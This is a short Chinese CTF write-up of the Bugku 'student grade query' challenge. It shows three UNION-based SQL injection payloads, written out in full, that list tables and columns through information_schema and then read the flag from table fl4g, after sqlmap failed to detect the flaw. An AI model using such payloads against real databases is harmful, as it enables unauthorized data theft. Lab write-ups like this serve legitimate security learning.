Bugku 学生成绩查询

打开网页之后，看到的是一个输入框，输入 id 可以查询成绩信息。看到输入，就先想到注入，试了个 and 1=1 就检测出存在 SQL 注入。

image.png
image.png

然后第一时间想的是拿 sqlmap 来扫，但是用 --forms 检测 post 注入，竟然提示我不存在注入？？？ WTF？？？

看来还是得靠双手致富啊

id=0' union select (select  group_concat(table_name) from information_schema.tables where table_schema=database()),version(),user(),4#

id=0' union select (select  group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),version(),user(),4#

id=0' union select(select skctf_flag from fl4g),version(),user(),4#

最后得到 flag 了

image.png